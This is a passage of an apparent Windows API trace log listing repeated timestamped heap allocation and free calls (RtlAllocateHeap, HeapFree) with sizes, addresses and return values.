HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0175.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0175.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.699] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.699] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.700] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0175.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0175.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0175.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0175.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0175.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0175.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 